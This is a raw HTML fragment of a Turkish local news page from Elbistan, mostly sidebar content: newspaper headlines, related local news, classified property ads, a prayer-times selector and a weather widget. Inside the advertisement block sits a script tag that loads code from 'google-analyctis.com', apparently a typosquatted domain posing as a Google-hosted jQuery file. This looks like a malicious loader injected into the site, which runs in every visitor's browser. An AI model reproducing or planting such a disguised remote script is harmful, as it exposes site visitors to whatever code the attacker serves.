<img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(66336);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="66336" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="e578f8066e71022f84de0252bd983198bbc9ed53" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/gunes" title="Güneş" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/gunes.jpg" alt="Güneş"/></div> <p>Güneş</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/harbi-gazete" title="Harbi Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/harbi-gazete.jpg" alt="Harbi Gazete"/></div> <p>Harbi Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/ortadogu" title="Ortadoğu" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/ortadogu.jpg" alt="Ortadoğu"/></div> <p>Ortadoğu</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/star" title="Star" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/star.jpg" alt="Star"/></div> <p>Star</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/turkiye.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-asya" title="Yeni Asya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/yeni-asya.jpg" alt="Yeni Asya"/></div> <p>Yeni Asya</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-birlik" title="Yeni Birlik" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/yeni-birlik.jpg" alt="Yeni Birlik"/></div> <p>Yeni Birlik</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenisoz" title="Yenisöz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/yenisoz.jpg" alt="Yenisöz"/></div> <p>Yenisöz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-04-11//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/seyyar-saticilarin-urunlerini-elbistan-belediyesi-satin-alacak-h66338.html" title="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/seyyar_saticilarin_urunlerini_elbistan_belediyesi_satin_alacak_h66338_618e6.jpg" alt="Seyyar satıcıların ürünlerini Elbistan Belediyesi satın alacak" /> <span>Seyyar satıcıların ürünlerini Elbistan Belediyesi...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistana-sessizlik-hakim-oldu-h66337.html" title="Elbistan’a sessizlik hakim oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/elbistana_sessizlik_hakim_oldu_h66337_74927.JPG" alt="Elbistan’a sessizlik hakim oldu" /> <span>Elbistan’a sessizlik hakim oldu</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/gida-yardimlari-evlerinde-teslim-ediliyor-h66335.html" title="Gıda yardımları evlerinde teslim ediliyor"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/gida_yarimlari_evlerinde_teslim_ediliyor_h66335_5729f.jpg" alt="Gıda yardımları evlerinde teslim ediliyor" /> <span>Gıda yardımları evlerinde teslim ediliyor</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/bolgede-ilk-kez-goruldu-sakin-oldurmeyin-h66334.html" title="Bölgede ilk kez görüldü, sakın öldürmeyin!"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/bolgede_ilk_kez_goruldu_sakin_oldurmeyin_h66334_32e6f.jpg" alt="Bölgede ilk kez görüldü, sakın öldürmeyin!" /> <span>Bölgede ilk kez görüldü, sakın öldürmeyin!</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kumbarasindaki-parayi-milli-dayanisma-kampanyasina-bagisladi-h66333.html" title="Kumbarasındaki parayı Milli Dayanışma Kampanyasına bağışladı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/kumbarasindaki_parayi_milli_dayanisma_kampanyasina_bagisladi_h66333_a4204.jpg" alt="Kumbarasındaki parayı Milli Dayanışma Kampanyasına bağışladı" /> <span>Kumbarasındaki parayı Milli Dayanışma Kampanyasına...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-175yil-ziyareti-h66332.html" title="Kaymakam Demir’den 175.yıl ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/kaymakam_demirden_175yil_ziyareti_h66332_2c259.jpg" alt="Kaymakam Demir’den 175.yıl ziyareti" /> <span>Kaymakam Demir’den 175.yıl ziyareti</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/oztunc-ciftciler-plan-degil-pilav-istiyor-pilav-h66331.html" title="Öztunç: “Çiftçiler plan değil pilav istiyor pilav!”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/oztunc_ciftiler_plan_degil_pilav_istiyor_pilav_h66331_efb1a.jpg" alt="Öztunç: “Çiftçiler plan değil pilav istiyor pilav!”" /> <span>Öztunç: “Çiftçiler plan değil pilav istiyor...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/yasak-basladi-uymayana-3-bin-180-tl-ceza-kesilecek-h66330.html" title="Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/yasak_basladi_uymayana_3_bin_180_tl_ceza_kesilecek_h66330_ffda6.jpg" alt="Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek" /> <span>Yasak başladı, uymayana 3 bin 180 TL ceza kesilecek</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-coban-araniyor-12476.html" title="TECRÜBELİ ÇOBAN ARANIYOR" >TECRÜBELİ ÇOBAN ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tecrubeli-coban-araniyor-12476.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="TECRÜBELİ ÇOBAN ARANIYOR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12475.html" title="Satılık Daire" >Satılık Daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12475.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/67003f008c5d7dd9a860fdd04482b79e62badbed.jpg" alt="Satılık Daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-dukkan-12471.html" title="Satılık DÜKKAN" >Satılık DÜKKAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-dukkan-12471.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/1c46005ef6389ddc328fb228397a0298246d316c.jpg" alt="Satılık DÜKKAN" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/saraykentte-dogalgazli-daire-12470.html" title="Saraykentte Doğalgazlı Daire" >Saraykentte Doğalgazlı Daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/saraykentte-dogalgazli-daire-12470.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/21c7ab734e3e2d847fc1159147ab9e71f74253ed.jpg" alt="Saraykentte Doğalgazlı Daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/osmanli-caddesinde-giris-kat-dairemiz-satiliktir-12467.html" title="Osmanlı caddesinde giriş kat dairemiz satılıktır" >Osmanlı caddesinde giriş kat dairemiz satılıktır</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/osmanli-caddesinde-giris-kat-dairemiz-satiliktir-12467.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/3d99f279b16949a07feba04cb8f1942ef11aa962.jpg" alt="Osmanlı caddesinde giriş kat dairemiz satılıktır" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12465.html" title="Satılık daire" >Satılık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12465.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-12459.html" title="Kiralik daire" >Kiralik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-12459.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralik daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-12448.html" title="KİRALIK DAİRE" >KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-12448.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/6a09bea37a4450466559f4eb0fc1def3664b5c28.jpg" alt="KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/duz-giris-daire-12445.html" title="Düz giriş daire" >Düz giriş daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/duz-giris-daire-12445.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Düz giriş daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/duz-giris-daire-12444.html" title="Düz giriş daire" >Düz giriş daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/duz-giris-daire-12444.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Düz giriş daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/duz-giris-daire-12443.html" title="Düz giriş daire" >Düz giriş daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/duz-giris-daire-12443.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Düz giriş daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-mhsekili-mevkiinde-satilik-2-katli-mus-12442.html" title="BATTALGAZİ MH.SEKİLİ MEVKİİNDE SATILIK 2 KATLI MUS" >BATTALGAZİ MH.SEKİLİ MEVKİİNDE SATILIK 2 KATLI MUS</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-mhsekili-mevkiinde-satilik-2-katli-mus-12442.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/270d4aeea918141dfce56f2b47ef2a7426737f34.jpg" alt="BATTALGAZİ MH.SEKİLİ MEVKİİNDE SATILIK 2 KATLI MUS" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-mhsekili-mevkiinde-satilik-2-katteras-12441.html" title="BATTALGAZİ MH.SEKİLİ MEVKİİNDE SATILIK 2 KAT+TERAS" >BATTALGAZİ MH.SEKİLİ MEVKİİNDE SATILIK 2 KAT+TERAS</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/battalgazi-mhsekili-mevkiinde-satilik-2-katteras-12441.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/74cd5a6d2cc585727cb169a694fccead945e4dbc.jpg" alt="BATTALGAZİ MH.SEKİLİ MEVKİİNDE SATILIK 2 KAT+TERAS" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/11-full-esyali-12437.html" title="1+1 full esyali" >1+1 full esyali</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/11-full-esyali-12437.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/0b3007f4cfc4f1d0a1eddb158c5797f4747f2951.jpg" alt="1+1 full esyali" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cumhuriyet-mhcecenistan-cd-41-kiralik-sifir-dai-12434.html" title="CUMHURİYET MH.ÇEÇENİSTAN CD. 4+1 KİRALIK SIFIR DAİ" >CUMHURİYET MH.ÇEÇENİSTAN CD. 4+1 KİRALIK SIFIR DAİ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cumhuriyet-mhcecenistan-cd-41-kiralik-sifir-dai-12434.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/5519616f5bb5c8e71fcf6b1454e90795d9359cf1.jpg" alt="CUMHURİYET MH.ÇEÇENİSTAN CD. 4+1 KİRALIK SIFIR DAİ" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-guvenlik-gorevlisi-paylasimi-ile-gonulleri-fethetti-h66270.html" title="Elbistanlı güvenlik görevlisi, paylaşımı..." class="en-left"><img 